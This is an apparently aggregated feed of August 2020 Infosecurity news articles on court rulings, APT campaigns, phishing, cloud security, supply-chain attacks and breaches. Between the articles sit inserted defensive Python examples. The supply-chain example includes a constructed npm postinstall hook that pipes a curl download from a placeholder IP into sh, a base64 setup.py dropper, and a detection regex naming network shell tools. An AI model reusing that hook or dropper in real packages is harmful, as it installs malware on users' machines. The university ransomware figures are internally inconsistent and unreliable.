Feed aggregator

US Court Orders Defendant to Unlock Phones

Info Security - Thu, 08/13/2020 - 15:10

A former Essex County sheriff's officer accused of obstructing a criminal investigation into a member of his motorcycle club has been ordered to make the contents of his cell phones accessible to law enforcement. 

The Supreme Court of New Jersey ruled on Monday that defendant Robert Andrews must comply with a search warrant by turning over the passcodes for his two phones. The decision was reached by a 4-3 majority of the seven justices.

Andrews was charged with official misconduct, hindering, and obstruction in 2016 for allegedly sharing information about an ongoing law enforcement investigation with the investigation's suspect. 

As part of the investigation, search warrants were drawn up requesting access to text messages and records of phone calls exchanged between Andrews and his fellow club member.

The defendant's attorney, Charles J. Sciarra, argued that Andrews should not have to surrender the passcodes of his cell phones because the Fifth Amendment to the US constitution states that no person "shall be compelled in any criminal case to be a witness against himself."

However, the majority held that Andrews' passcodes were not “testimonial” and noted that Andrews had not challenged the search warrants themselves.

Justice Lee Solomon’s opinion found “neither federal nor state protections against compelled disclosure shield Andrews’ passcodes.” 

Solomon wrote that under the terms of the unchallenged and lawfully issued search warrants, New Jersey had “the right to the cellphones’ purportedly incriminating contents.”

The decision prompted a dissenting justice to raise a broader question about how much privacy American smartphone users can expect in future.

Author of the dissenting opinion Justice Jaynee LaVecchia wrote: “Will we allow law enforcement—and our courts as their collaborators—to compel a defendant to disgorge undisclosed private thoughts—presumably memorized numbers or letters—so that the government can obtain access to encrypted smartphones?”

Describing the ruling's impact on the right of New Jersey residents to plead the Fifth, Matt Adams, vice president of the Association of Criminal Defense Lawyers of New Jersey, said it “is taking a stick of dynamite to that fundamental right and imploding it from within."

Categories: Cyber Risk News

CactusPete Targets Eastern European Military

Info Security - Thu, 08/13/2020 - 14:34

An advanced persistent threat (APT) group has been caught cyber-spying on financial and military organizations in Eastern Europe.

CactusPete, also known as Karma Panda or Tonto Team, has been active since at least 2012 but appears to have ramped up its activities over the past year and a half. 

Researchers at Kaspersky were able to link hundreds of samples of a backdoor called Bisonal to a campaign orchestrated by CactusPete. The samples appeared between March 2019 and April 2020 at a pace of around 20 samples per month, which researchers believe "underscores the fact that CactusPete is developing rapidly."

The threat group's most recent wave of activity was first detected by researchers in February 2020, when they discovered an updated version of Bisonal. This version was linked to over 300 other samples in the wild using the Kaspersky Threat Attribution Engine, a tool that analyzes malicious code for similarities with code deployed by known threat actors.

"This time, they’ve upgraded their backdoor to target organizations in the military and financial sectors in Eastern Europe, most likely in an effort to gain access to confidential information," wrote researchers.

"The speed at which the new malware samples are being created suggests the group is rapidly developing." 

Researchers found evidence that the group has refined its capabilities, gaining access to more sophisticated code like ShadowPad in 2020. They believe that CactusPete is on the hunt for "highly sensitive information" and warned organizations in the Eastern European region to be on alert.

Explaining how the threat group's malicious payload functions, researchers said: "Once installed on the victim’s device, the Bisonal backdoor it uses allows the group to silently start various programs, terminate any processes, upload/download/delete files, and retrieve a list of available drives. 

"In addition, as the operators move deeper into the infected system, they deploy keyloggers to harvest credentials and download privilege escalation malware to gradually gain more and more control over the system."

While previous campaigns by the group used spear-phishing to reach victims, researchers were unable to pin down how CactusPete is getting targets to install the latest version of its backdoor.

Categories: Cyber Risk News

Phishing Tactic Targets Verizon Users' Credentials

Info Security - Thu, 08/13/2020 - 13:01

A new phishing campaign targeting Verizon customers to steal account credentials and personal details has been detected.

According to research by Armorblox, the email resembles a secure message from Verizon Support and is titled “Your attention is urgently required”. When the recipient clicks the link, they are redirected to a Verizon lookalike website that asks for their email address, Verizon account password, email account password and phone number.

Speaking to Infosecurity, Arjun Sambamoorthy, co-founder and head of engineering at Armorblox, said by collecting the target’s credentials, the attackers are phishing for personal details, and allowing more emails to be sent from the victim’s domain which would appear to be legitimate. He also said successful access to the victim’s account would also allow access to details of any other users of the Verizon service.

Sambamoorthy also said the emails got through because they did not follow the traits of more traditional phishing attacks. In one case the phishing page was hosted under a Wicca follower site named “Black Sun Coven” as the parent domain. Sambamoorthy explained that the domain was registered in August 2019 and used for the phishing attack 11 months later.

“Assuming the website being discussed here is legitimate, the attackers likely exploited vulnerabilities in the web server or the Content Management Systems (CMS) to host phishing pages on the legitimate parent domain without the website admins knowing about it,” he said.

Sambamoorthy said “a handful of users” had been impacted, and the attack was still under investigation, while he had seen similar tactics used for other services.

“We have seen variants of this attack,” he said. “Attackers do this to hijack the trust associated with these brands, induce urgency in their victims (e.g. Your Amazon delivery address is incorrect, There's a billing failure on your Netflix account), and in some cases to circumvent any company SSO rules that might be in place.”

As for the use of the Wicca follower page, Sambamoorthy said Armorblox was increasingly seeing attackers host phishing pages on dummy sites or on orphaned pages of legitimate websites. “They're able to do this by exploiting vulnerabilities in the web servers or CMS without website admins knowing about it. Based on our initial research, Black Sun Coven was most likely a dummy site the attackers created. The site didn't have any contact information and online searches for ‘Black Sun Coven’ yielded unrelated results to the site in question.”
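The checks a responder would run on a link like the one described above, as an added example that is not Armorblox's code: follow the redirect chain, compare the landing host against the domains the brand actually owns, and look at how recently the parent domain was registered. The redirect map, the hostnames and the registration date below are constructed for the example (the allowlist of Verizon domains and the 365-day threshold are assumptions); a real implementation would issue the HTTP requests and a WHOIS lookup instead of reading the dictionaries.

```python
"""Added example: offline triage of a phishing link of the kind described
above. Not Armorblox code; the redirect map, hosts and registration dates
below are constructed for the example."""
from datetime import date
from urllib.parse import urlparse

# Domains the impersonated brand really uses (assumed allowlist for the example).
BRAND_DOMAINS = {"verizon": {"verizon.com", "verizonwireless.com"}}

# Stand-in for HTTP 30x responses, so the example needs no network access.
# An unrelated "parent domain" bounces the victim to a lookalike host.
# All hosts are constructed.
REDIRECTS = {
    "https://blacksuncoven.example/track?id=7":
        "https://blacksuncoven.example/wp-content/vz/login.html",
    "https://blacksuncoven.example/wp-content/vz/login.html":
        "https://verizon-support.example/login",
}

# Constructed WHOIS creation dates; the article says the real parent domain
# was registered about eleven months before it was used.
REGISTERED_ON = {"blacksuncoven.example": date(2019, 8, 1)}


def registrable_domain(host):
    """Naive eTLD+1 (last two labels). Production code should use the
    public suffix list so that e.g. example.co.uk is handled correctly."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def follow_redirects(url, redirects, max_hops=10):
    """Walk the redirect map and return the full chain, first URL included."""
    chain = [url]
    while chain[-1] in redirects:
        if len(chain) > max_hops:
            raise ValueError("redirect chain too long (loop?)")
        chain.append(redirects[chain[-1]])
    return chain


def triage(url, brand, redirects=REDIRECTS, registered_on=REGISTERED_ON,
           today=date(2020, 7, 15)):
    """Return a verdict with reasons for one link claiming to be from `brand`."""
    chain = follow_redirects(url, redirects)
    first_host = urlparse(chain[0]).hostname or ""
    final_host = urlparse(chain[-1]).hostname or ""
    reasons = []

    # Brand name in the landing hostname, but not a brand-owned domain.
    if brand in final_host.replace("-", "") and \
            registrable_domain(final_host) not in BRAND_DOMAINS[brand]:
        reasons.append(f"lookalike landing host {final_host}")

    # The link lands on a different domain from the one the victim was shown.
    if registrable_domain(first_host) != registrable_domain(final_host):
        reasons.append("redirects to a different domain")

    # Young parent domain: registered less than a year before use.
    created = registered_on.get(registrable_domain(first_host))
    if created is not None and (today - created).days < 365:
        reasons.append(f"parent domain registered {(today - created).days} days ago")

    return {"chain": chain, "final_host": final_host,
            "verdict": "suspicious" if reasons else "no findings",
            "reasons": reasons}


if __name__ == "__main__":
    print(triage("https://blacksuncoven.example/track?id=7", "verizon"))
    print(triage("https://www.verizon.com/account", "verizon"))
```

None of the three signals is conclusive on its own (legitimate mail also goes through tracking redirects, and brands do register new domains), which is why the function returns the reasons rather than a bare boolean: an analyst can weigh them, and a mail gateway can require two of the three before quarantining.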

Categories: Cyber Risk News

IT Pros Name Misconfiguration #1 Cloud Security Threat

Info Security - Thu, 08/13/2020 - 10:30

Configuration errors are the number one threat to cloud security, according to a new poll of IT and security professionals by Check Point.

The security vendor interviewed 653 industry professionals to compile its 2020 Cloud Security Report.

Three-quarters (75%) claimed to be “very” or “extremely” concerned about cloud security, with most (52%) believing that the risks are higher in the public cloud than on-premises.

The top four threats were cited as: misconfiguration (68%), unauthorized cloud access (58%), insecure interfaces (52%), and account hijacking (50%). 

These security concerns have created multiple barriers to further adoption of cloud services. The top inhibitor of adoption was a lack of qualified staff (55%), up from fifth place last year.

This may go some way to explaining respondents’ concerns around configuration errors, especially as 68% of these organizations are using two or more public cloud providers — adding to the complexity.

Other top barriers included budget constraints (46%), data privacy issues (37%), and a lack of integration with on-premises security (36%).

The number of organizations struggling with existing security tools also rose from last year, from 66% to 82% — indicating that many may still be trying to apply on-premises technologies to cloud environments.

The good news is that despite the current macroeconomic climate, 59% of organizations expect their cloud security budget to increase over the next 12 months, with respondents on average allocating 27% of their security budget to cloud security.

“The report shows that organizations’ cloud migrations and deployments are racing ahead of their security teams’ abilities to defend them against attacks and breaches. Their existing security solutions only provide limited protections against cloud threats, and teams often lack the expertise needed to improve security and compliance processes,” said TJ Gonen, head of cloud product line at Check Point. 

“To close these security gaps, enterprises need to get holistic visibility across all of their public cloud environments, and deploy unified, automated cloud-native protections, compliance enforcement and event analysis.”

Cloud security posture management (CSPM) tools are widely viewed as a best-practice way to help mitigate the risk of misconfigurations. One provider, Trend Micro, claims that its Cloud One - Conformity product detects 230 million of these errors every single day.

Categories: Cyber Risk News

CASB Complexity Means Many Products Are Under-Utilized

Info Security - Thu, 08/13/2020 - 09:23

Product complexity and a lack of in-house skills mean many organizations are failing to fully realize the benefits of their cloud access security broker (CASB) solutions, according to the Cloud Security Alliance (CSA).

The industry body polled over 200 IT and security professionals to better understand their challenges surrounding CASBs, which help organizations extend their security policies to the cloud.

It found that while 90% of organizations now use the software, half (50%) don’t have sufficient staff to make the most of them.

Over a third (34%) claimed that product complexity is also preventing them from realizing the solution’s full potential. In fact, over 30% admitted they have to use multiple CASB products to fulfil their security requirements.

Over half said they use CASBs to monitor user behavior (55%) and to provide insight into unauthorized access (53%). However, fewer than two-fifths (38%) use the tools for regulatory compliance and even fewer (22%) for internal compliance.

The solutions can help to bolster security and compliance by, for example, encrypting data using a company’s own keys before it reaches a SaaS provider. Identity and access management (IAM) is another popular feature, enabling IT managers to control how users log into apps and what corporate information they can view.

“CASB solutions have been underutilized on all the pillars but in particular on the compliance, data security, and threat protection capabilities within the service,” said Hillary Baron, lead author of the report and CSA research analyst.

“It’s clear that training and knowledge of how to use the products need to be made a priority if CASBs are to become effective as a service or solution.”

Back in 2018, it was predicted that 83% of enterprise workloads would be in the cloud by 2020. Yet cybersecurity concerns remain the number one barrier to cloud adoption, according to many studies.

Categories: Cyber Risk News

Open Source Supply Chain Attacks Surge 430%

Info Security - Thu, 08/13/2020 - 08:53

Security experts are warning of a 430% year-on-year increase in attacks targeting open source components directly in order to covertly infect key software supply chains.

There were 929 attacks recorded between July 2019 and May 2020, according to Sonatype’s annual State of the Software Supply Chain report. The study was compiled from analysis of 24,000 open source projects and 15,000 development organizations alongside interviews with 5,600 software developers.

The targeting of open source components by malicious actors is concerning because of their popularity among DevOps teams to accelerate time-to-market.

According to the report, 1.5 trillion component download requests are projected in 2020 across all major open source ecosystems.

Node.js (npm) and Python (PyPI) repositories are thought to be among the most commonly targeted by attackers, as malicious code can be triggered during package installation: npm runs a package's lifecycle scripts (such as postinstall) automatically, and pip executes setup.py when it installs a source distribution.
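Because install-time hooks are the attack surface, the check a practitioner wants is an audit of what a package would execute on install before it is installed. The following is an added example, not code from Sonatype or the report; the two package.json manifests and the setup.py text are constructed (the IP address is from the documentation range, and the encoded payload is a placeholder), and the regular expressions are deliberately crude indicators, not a substitute for a real SCA tool.

```python
"""Added example (not from the Sonatype report): audit a package manifest for
code that would run at install time, which is what makes npm and PyPI
attractive to attackers. The manifests below are constructed; the address
203.0.113.9 is a TEST-NET documentation address."""
import json
import re

# npm runs these scripts automatically around `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                       "prepare", "prepublish", "preuninstall", "postuninstall")

# Crude indicators of a script that fetches or decodes something at install time.
SUSPICIOUS = re.compile(
    r"curl|wget|base64|\beval\b|child_process|/dev/tcp|powershell|\bnc\b", re.I)


def audit_npm_manifest(package_json):
    """Return one finding per lifecycle hook defined in package.json."""
    manifest = json.loads(package_json)
    findings = []
    for hook in NPM_LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd is None:
            continue
        findings.append({
            "package": manifest.get("name", "?"),
            "hook": hook,
            "command": cmd,
            "severity": "high" if SUSPICIOUS.search(cmd) else "medium",
        })
    return findings


def audit_setup_py(source):
    """setup.py is executed by pip for source distributions; flag the usual
    ways of smuggling code into that step."""
    findings = []
    if re.search(r"cmdclass\s*=", source):
        findings.append("overrides setuptools commands (custom code at install)")
    if re.search(r"\b(os\.system|subprocess|urllib|requests)\b", source):
        findings.append("runs commands or fetches over the network at import")
    if SUSPICIOUS.search(source):
        findings.append("suspicious tokens (download/decode/eval)")
    return findings


# Constructed manifests: one clean, one with an install-time dropper.
CLEAN_PACKAGE_JSON = json.dumps({
    "name": "left-pad-ish", "version": "1.0.0",
    "scripts": {"test": "jest"},
})
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "colors-utils", "version": "1.0.3",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('child_process').exec("
                       "'curl -s http://203.0.113.9/i.sh | sh')\"",
    },
})
# Constructed setup.py: a custom install command decoding a hidden payload.
MALICIOUS_SETUP_PY = """
from setuptools import setup
from setuptools.command.install import install
import base64, os

PAYLOAD = b'<base64 of a download-and-run command, elided>'

class PostInstall(install):
    def run(self):
        install.run(self)
        os.system(base64.b64decode(PAYLOAD).decode())

setup(name='requests-util', version='0.1', cmdclass={'install': PostInstall})
"""


if __name__ == "__main__":
    print(audit_npm_manifest(MALICIOUS_PACKAGE_JSON))
    print(audit_setup_py(MALICIOUS_SETUP_PY))
```

The operational complement to the audit is to stop hooks running at all where they are not needed: `npm ci --ignore-scripts` skips lifecycle scripts, and `pip install --only-binary=:all:` refuses source distributions so no setup.py is executed during installation.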

This type of software supply chain attack is possible because in the open source world it is harder to discriminate between good and bad actors, and due to the inter-connected nature of projects, Sonatype claimed.

On the latter point, open source projects may have hundreds or thousands of dependencies on other projects that may contain known vulnerabilities which can be exploited.

In 2019, over 10% of global Java OSS downloads had at least one known vulnerability, with new flaws being exploited in the wild within three days of public disclosure, the report claimed.

Today, 90% of components in an application are open source and 11% of those are known to contain vulnerabilities.

Sonatype CEO, Wayne Jackson, drew a distinction between “next-gen” upstream attacks and “legacy” software supply chain attacks, in which attackers go after vulnerabilities in products as soon as they are disclosed before organizations have time to remediate.

“Our research shows that commercial engineering teams are getting faster in their ability to respond to new zero day vulnerabilities,” he said.

“Therefore, it should come as no surprise that next generation supply chain attacks have increased 430% as adversaries are shifting their activities ‘upstream’ where they can infect a single open source component that has the potential to be distributed ‘downstream’ where it can be strategically and covertly exploited.”

Development teams able to mitigate these risks are more likely to use automated software composition analysis (SCA) tools across the development lifecycle, and to centrally maintain a software bill of materials (SBOM) for each application, the report claimed.

Categories: Cyber Risk News

Human Error Threatens Cloud Security

Info Security - Wed, 08/12/2020 - 17:39

Virtually all security professionals believe that human error could put the security of cloud data at risk, according to new research published today.

A survey commissioned by Tripwire and carried out last month by Dimensional Research found that 93% of security professionals were concerned that human error could result in the accidental exposure of their cloud data. 

Despite their concern over human error, 22% of those surveyed said that they assess their cloud security posture manually. 

The survey evaluated the opinions of 310 security professionals on the implementation of cloud security best practices. 

According to the research, a number of organizations experience difficulties in monitoring and securing their cloud environments. A majority of security professionals (76%) state they have difficulty maintaining security configurations in the cloud, and 37% said their risk management capabilities in the cloud are worse compared with other parts of their environment.

The survey also found that security professionals tend not to keep tabs on their real-time cloud security situation. Only 21% of organizations were found to assess their overall cloud security posture in real time or near real time. 

While 21% said they conduct weekly cloud security evaluations, 58% said they wait until a month or more has gone by.

Maintaining security was a challenge for most organizations, with only 22% saying that they are able to maintain continuous cloud security compliance over time.

“Security teams are dealing with much more complex environments, and it can be extremely difficult to stay on top of the growing cloud footprint without having the right strategy and resources in place,” said Tim Erlin, vice president of product management and strategy at Tripwire. 

“Fortunately, there are well-established frameworks, such as CIS benchmarks, which provide prioritized recommendations for securing the cloud. However, the ongoing work of maintaining proper security controls often goes undone or puts too much strain on resources, leading to human error.” 

The amount of automation employed varied across cloud security best practices. While 51% use automated alerts with context for suspicious behavior, only 45% automatically assess new cloud assets as they are added to the environment.
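Both the Check Point survey above (misconfiguration as the top cloud threat, CSPM as the mitigation) and this Tripwire one (CIS benchmarks, and automatically assessing new assets as they appear) come down to the same mechanism: codified checks run over an inventory of cloud resources. The block below is an added example of that mechanism, not code from Check Point, Tripwire or any CSPM product; the resource records are a constructed, simplified inventory (the field names are assumptions), and the three rules follow the shape of CIS AWS Foundations Benchmark recommendations without claiming their numbering.

```python
"""Added example, not Check Point's or Tripwire's code: CIS-benchmark-style
posture checks run over a constructed cloud inventory, with the option to
assess only assets created since a given time (the "new cloud assets" case
in the Tripwire survey). Resource shapes are simplified and assumed."""
from datetime import datetime

PUBLIC_CIDRS = {"0.0.0.0/0", "::/0"}
ADMIN_PORTS = {22: "SSH", 3389: "RDP"}
PUBLIC_ACLS = {"public-read", "public-read-write", "authenticated-read"}


def check_security_group(sg):
    """Flag ingress rules that expose administrative ports to the world."""
    findings = []
    for rule in sg["ingress"]:
        if rule["cidr"] not in PUBLIC_CIDRS:
            continue
        exposed = [name for port, name in ADMIN_PORTS.items()
                   if rule["from_port"] <= port <= rule["to_port"]]
        if exposed:
            findings.append((sg["id"], f"{'/'.join(exposed)} open to {rule['cidr']}"))
    return findings


def check_bucket(bucket):
    """Flag public ACLs and a disabled public-access block."""
    findings = []
    if bucket["acl"] in PUBLIC_ACLS:
        findings.append((bucket["id"], f"public ACL {bucket['acl']}"))
    if not bucket["block_public_access"]:
        findings.append((bucket["id"], "public access block disabled"))
    return findings


def check_volume(volume):
    """Flag block storage that is not encrypted at rest."""
    return [] if volume["encrypted"] else [(volume["id"], "volume not encrypted at rest")]


CHECKS = {"security_group": check_security_group,
          "s3_bucket": check_bucket,
          "ebs_volume": check_volume}

# Constructed inventory: what a CSPM collector might return for one account.
INVENTORY = [
    {"type": "security_group", "id": "sg-web", "created_at": "2020-06-01T10:00:00",
     "ingress": [{"cidr": "0.0.0.0/0", "from_port": 443, "to_port": 443},
                 {"cidr": "10.0.0.0/8", "from_port": 22, "to_port": 22}]},
    {"type": "security_group", "id": "sg-bastion", "created_at": "2020-08-13T09:00:00",
     "ingress": [{"cidr": "0.0.0.0/0", "from_port": 0, "to_port": 65535}]},
    {"type": "s3_bucket", "id": "prod-backups", "created_at": "2020-03-10T08:00:00",
     "acl": "public-read", "block_public_access": False},
    {"type": "s3_bucket", "id": "audit-logs", "created_at": "2020-03-10T08:00:00",
     "acl": "private", "block_public_access": True},
    {"type": "ebs_volume", "id": "vol-db-1", "created_at": "2020-08-13T11:30:00",
     "encrypted": False},
]


def assess(inventory, since=None):
    """Run every applicable check. With `since` (ISO 8601 string), assess only
    assets created at or after that time, e.g. on each inventory refresh."""
    cutoff = datetime.fromisoformat(since) if since else None
    findings = []
    for resource in inventory:
        if cutoff is not None and datetime.fromisoformat(resource["created_at"]) < cutoff:
            continue
        findings.extend(CHECKS[resource["type"]](resource))
    return findings


if __name__ == "__main__":
    for rid, msg in assess(INVENTORY):
        print(f"{rid}: {msg}")
    print("new since 2020-08-12:", assess(INVENTORY, since="2020-08-12T00:00:00"))
```

Running the checks only over assets created since the last pass is what turns a monthly audit into the near-real-time assessment that most of the surveyed organizations say they lack; the full run is still needed periodically, because a resource that was compliant when created can be reconfigured later.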

Categories: Cyber Risk News

FireEye Announces Bug Bounty Program

Info Security - Wed, 08/12/2020 - 17:09

California cybersecurity company FireEye today announced that it is opening up its bug bounty program to the public. 

FireEye previously set up a private bug bounty program in partnership with Bugcrowd. As of today, the company is extending the program to any researcher who registers through the Bugcrowd platform.  

A spokesperson for FireEye said: "While we’ve been heavily involved with responsible disclosure, including helping other companies set up and modify their own programs, we are taking the next step in this effort."

Over the coming months, researchers will be invited to seek out weaknesses in FireEye's products, services, business applications, and infrastructure security. Cash rewards ranging from $50 to $2,500 will be offered per vulnerability detected. 

Vulnerabilities submitted as part of the program will typically be accepted or rejected within five days. 

A spokesperson for the company said: "As security researchers ourselves, FireEye understands the importance of investigating and responding to security issues. We also realize that despite our efforts to eradicate security vulnerabilities from our products and services, there will always be emerging threats, new vulnerabilities, and opportunities to improve. 

"To that end, FireEye believes wholeheartedly in embracing the public research community when security issues are discovered and working with security researchers to fix the identified issue and remediate any related and/or underlying systemic issues to further improve our security posture."

Threats are split into four different levels of technical severity ranging from low to critical. The program will use the Bugcrowd Vulnerability Rating Taxonomy for the initial prioritization/rating of findings.

Website testing targets listed in the scope include fireeye.com, fireeye.market, fireeye.dev, mandiant.com, flare-on.com, and cloudvisory.com. Third-party products that may be used by FireEye as well as FireEye systems or products in AWS GovCloud are not within the scope.

Bug bounty hunters have been warned by the company not to perform research on FireEye products licensed, owned, or operated by a FireEye customer without their express permission.

Researchers who prefer not to receive payment for their work, or who wish to report product- or services-related findings, can do so via the FireEye Responsible Disclosure program that is also managed by Bugcrowd.

Categories: Cyber Risk News

Pace Center for Girls' Donor Data Breached

Info Security - Wed, 08/12/2020 - 16:39

A non-profit social services agency in Florida has been hit by a data breach after a security incident affected one of its outside vendors.

Pace Center for Girls has issued a warning to its supporters after the organization discovered that some of its data had been affected by a May security breach at Blackbaud.

South Carolina–based cloud computing provider Blackbaud had been engaged by the Pace Center as a fundraising and donor software provider. 

Mary Marx, president and CEO of Pace, said that while the Center's internal record-keeping had not been affected by the breach, some information belonging to its donors and fundraisers had been impacted. 

Data affected included donors’ names, physical addresses, phone numbers, birthdates, and donor profile information, such as giving history.

“We don't keep credit card information or Social Security information on our database," said Marx. 

Pace is one of the more than 200 organizations that have been impacted by the Blackbaud security incident. Other victims include the Boy Scouts of America, the National Trust, and more than ten universities in the UK, US, and Australia. 

“We wanted to make you aware of a security breach experienced by our fundraising and donor software provider, Blackbaud, that was reported to us in mid-July,” Pace told its donors and fundraisers in an email dated August 5.

“Our team worked on the system with them to find out what happened.” 

The Center said it was maintaining communications with Blackbaud “to ensure we can be immediately informed of any further developments."

Following the breach, Pace said it "will be rolling out additional intensive authentication processes to further protect our data.” The non-profit already uses encryption to protect all sensitive information. 

The Pace Center for Girls was set up in 1985 to provide education, counseling, training, and advocacy to girls and young women as an alternative to institutionalization or incarceration. 

Today, Pace serves over 3,000 girls a year through 21 centers dotted throughout Florida.

Marx said that the funding Pace relies on to deliver its services comes from a collection of approximately 30,000 donors that includes corporations, foundations, and individuals. 

Categories: Cyber Risk News

Incident Response Exercises Not Taken Seriously by Business Leaders

Info Security - Wed, 08/12/2020 - 12:15

Only 2% of organizations have run incident response scenarios related to the pandemic response.

According to research by Immersive Labs covering 402 organizations, nearly 40% are not fully confident in their teams' training to handle a data breach if one occurred, and 65% of exercises consist of reviewing PowerPoint slides.

In an email to Infosecurity, Heath Renfrow, director and vCISO at the Crypsis Group, said incident response is one of the pillars of a sound information security program, and it needs to be taken more seriously—not only among the organization’s information security team, but all the way to the CEO and board of directors.

“It is evident from the incident response cases we assist with daily that incident response is frequently viewed strictly as information security/IT’s responsibility, rather than from an overall business perspective,” he said. “This is unfortunate, because many across the business—from leadership to legal, communications and HR staff—have a potential role to play and can help influence better outcomes and the right cultural mindset to be better prepared for an incident.”

Renfrow said that to build stronger programs, incident response plans and playbooks should be developed and exercised at a broad company level — but that requires buy-in from the top leadership.

To achieve that buy-in, he recommended first running tabletop exercises within the information security team alone to refine the plan, then updating the documents with the lessons learned. Next, identify a “champion” in the executive ranks, a cybersecurity advocate who is influential among leadership, and sit down with inside or outside counsel to discuss the scenarios the company could face from a range of cyber-attacks and the ramifications of each (e.g. downtime, reputational loss, regulatory notifications, sensitive information exposed).

“With that information in hand, security teams can work with their identified champion to get executive leadership educated on those risks and bought into an incident response tabletop exercise,” he said.

The Immersive Labs research also found that 61% of respondents think having an incident response plan is the single most effective way to prepare for a security incident. Yet when organizations do perform crisis exercises, nearly 40% of the senior security leaders surveyed said the last exercise generated no action from the business.

A quarter of organizations ran crisis exercises without senior cybersecurity leadership in attendance, and only 20% of exercises involved communications team members.

James Hadley, CEO of Immersive Labs, said: “With three-quarters of organizations agreeing that business continuity was at the forefront of their minds, it is time to close the gap between attackers and defenders and shake up the outdated status quo. This requires faster, shorter crisis drills run with the people you will be standing shoulder to shoulder with when the worst happens. Crisis exercises must be made more contemporary.

“Dusting off the three-ring binder crisis plan does not cut it today. In the first 30 minutes of a crisis, it is highly unlikely you’re thinking of your plan. It’s the real-life, crisis simulation training that prepares organizations to effectively respond to security incidents.”

Renfrow said a company-wide incident response exercise should include legal, HR, communications, and all senior business executives including the CEO, and should be focused on a plausible cyber-incident, for example, a ransomware attack, and walk through the chain of events and response by the entire organization. It should also include the steps needed to engage (as applicable) any retained cyber insurance companies, outside counsel, and incident response providers.

“These exercises truly do open the eyes of executive leadership, and most of the time they really start seeing cybersecurity as an asset to the business that is vital to the overall success of the organization,” Renfrow said.

Categories: Cyber Risk News

Microsoft Patches 120 CVEs Including Two Zero Days

Info Security - Wed, 08/12/2020 - 11:10

It was another big Patch Tuesday this month with over 100 CVEs fixed by Microsoft, including two being actively exploited in the wild.

Of the 120 vulnerabilities addressed this month, 17 were rated critical. Experts agreed that system administrators should focus on the two zero-day bugs.

“The first, CVE-2020-1464, is a spoofing vulnerability in Windows Operating System. The vulnerability exists in the way Windows validates file signatures,” explained Recorded Future senior security architect, Allan Liska.

“When this vulnerability is exploited, it allows an attacker to bypass security features to allow improperly signed files to be loaded. This vulnerability impacts Windows 7 through Windows 10 and Windows Server 2008 through 2019.”

The second priority is CVE-2020-1380, a remote code execution vulnerability in Microsoft’s Scripting Engine related to how objects in memory are handled by Internet Explorer.

Successful exploitation, via a malicious web page or a document with an embedded ActiveX control, would let an attacker execute arbitrary code as the current user, according to Satnam Narang, staff research engineer at Tenable.

“If said user happens to have administrative privileges, the attacker would be able to perform a variety of actions including creating accounts with full privileges, accessing and deleting data and installing programs,” he warned.

“This vulnerability has reportedly been exploited in the wild as a zero-day, likely as part of a targeted attack.”

Elsewhere, CVE-2020-1554, CVE-2020-1492, CVE-2020-1379, CVE-2020-1477, and CVE-2020-1525 are all critical RCE vulnerabilities in the Windows Media Foundation (WMF), a framework that has now been hit by 10 critical bugs this year, according to Liska.

Adding to the workload for system admins, Adobe fixed 26 CVEs in Acrobat and Reader and Apple resolved 20 CVEs in iCloud yesterday.

Categories: Cyber Risk News

Police Use of Facial Recognition Ruled Unlawful in World First Case

Info Security - Wed, 08/12/2020 - 09:15

Rights groups are celebrating after the Court of Appeal ruled that South Wales Police's use of automated facial recognition (AFR) technology was unlawful, although the force may not halt future deployments.

The case was brought by Liberty and activist Ed Bridges, 37, from Cardiff, whose image had been captured twice in 2017 and 2018 as police trawled through crowds to match the images with suspects' headshots in their database.

Although the case was thrown out by the High Court, the appeals judges ruled in Bridges’ favor on three counts, including two related to a breach of his right to privacy under article 8 of the European Convention on Human Rights.

On the third count, the judges agreed that the police force had failed to satisfy itself that “everything reasonable which could be done had been done in order to make sure that the software used does not have a racial or gender bias.”

Liberty hailed the victory in what it claimed was the world’s first legal challenge to police use of AFR and called for its outright ban, adding that as many as 500,000 innocent people may have had their facial images captured by South Wales Police.

“This judgment is a major victory in the fight against discriminatory and oppressive facial recognition,” argued Liberty lawyer, Megan Goulding.

“The court has agreed that this dystopian surveillance tool violates our rights and threatens our liberties. Facial recognition discriminates against people of colour, and it is absolutely right that the court found that South Wales Police had failed in their duty to investigate and avoid discrimination.”

However, the victory could be short-lived. Although the force is not planning to take an appeal to the Supreme Court, South Wales Police chief constable Matt Jukes said after the verdict that “I am confident that this is a judgement we can work with.”

All eyes will now be on the government to push ahead with long overdue plans to draw up a statutory code of practice, as advocated by privacy regulator the Information Commissioner’s Office (ICO).

Categories: Cyber Risk News

A Third of UK Unis Hit By Ransomware in Last 10 Years

Info Security - Wed, 08/12/2020 - 08:20

Around a third (33%) of UK universities have been targeted with ransomware, freedom of information (FOI) requests submitted by the agency TopLine Comms have revealed.

Of the 134 universities the requests were sent to, 105 responded. Of these, 35 (33%) revealed they had been subjected to attack while 25 (24%) said they hadn’t. The remaining 43 (45%) refused to answer, with the main concern being that admission of attack could lead to further targeting.

Those that refused to answer the FOI added that no inference should be drawn from the refusal as to whether they’d been attacked or not.

Of the 35 universities that admitted to having faced ransomware attack, 34 confirmed they did not pay ransoms, with just one, Liverpool John Moores, refusing to disclose whether they had paid a ransom or not.

Whilst most attacks were isolated incidents, Sheffield Hallam University stood out as it had reported 42 ransomware attacks since 2013. It was followed by City, University of London, which has been targeted seven times since 2014.

The years with the greatest total number of incidents were 2015 (31%), 2016 (34%) and 2017 (23%).

Ransomware attacks on universities have been brought into sharper focus recently following the admission by University of California San Francisco in June that it had paid over $1.14m to criminals after discovering that critical academic data related to its COVID-19 research had been encrypted.

Luke Budka, head of digital PR and SEO at TopLine Comms, said: “The recent revelation that hackers extorted $1.14m from the University of California prompted us to submit requests to UK universities asking for details on ransomware attacks and ransom amounts paid. We were naturally most interested in Russell Group universities as their research focus suggests they’ve got the most valuable intellectual property.

“Of the 18 Russell Group universities that responded, all but three refused to answer the questions submitted. The University of Manchester admitted it had been attacked but said it didn’t record when; The University of Sheffield was attacked in 2015 and The University of Edinburgh stated it had not been attacked in the last ten years.”

Speaking to Infosecurity about the findings, Steven Furnell, professor of cybersecurity at the University of Nottingham, commented: “The fact that a third indicated that they had been ‘subject to an attack’ really just serves to confirm the prevalence of the threat – which in itself is not a surprise, as we know ransomware has been a significant element of the threat landscape for the last few years.”

